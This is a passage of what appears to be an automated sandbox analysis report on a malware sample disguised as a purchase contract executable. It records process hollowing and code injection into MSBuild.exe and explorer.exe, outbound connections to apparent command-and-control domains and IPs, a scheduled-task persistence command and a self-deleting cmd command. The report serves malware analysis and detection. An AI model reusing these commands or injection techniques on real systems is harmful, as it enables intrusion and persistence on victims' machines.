          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BA8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B76DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B17D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B33D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B73540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BA3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B38EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BAFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BAFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B28E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B08794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B337F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.mtsnurulislamsby.com
          Source: C:\Windows\explorer.exeNetwork Connect: 209.99.40.222 80
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.129 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.71.233.107 80
          Source: C:\Windows\explorer.exeDomain query: www.lifestylebykendra.com
          Source: C:\Windows\explorer.exeDomain query: www.cypios.net
          Source: C:\Windows\explorer.exeDomain query: www.ascope.club
          Source: C:\Windows\explorer.exeNetwork Connect: 95.215.210.10 80
          Source: C:\Windows\explorer.exeNetwork Connect: 199.34.228.189 80
          Source: C:\Windows\explorer.exeDomain query: www.wintonplaceoh.com
          Source: C:\Windows\explorer.exeDomain query: www.narrowpathwc.com
          Source: C:\Windows\explorer.exeDomain query: www.5fashionfix.net
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.braun-mathematik.online
          Source: C:\Windows\explorer.exeDomain query: www.teamtacozzzz.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 180000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E9C008
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp'
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: explorer.exe, 00000005.00000000.665240943.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.665573323.0000000001080000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.904896244.00000000031E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp, explorer.exe, 00000005.00000000.678646316.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000009.00000002.904896244.00000000031E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.665573323.0000000001080000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.904896244.00000000031E0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000005.00000000.665573323.0000000001080000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.904896244.00000000031E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.681965378.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Users\user\Desktop\Purchase contract #9009.exe VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
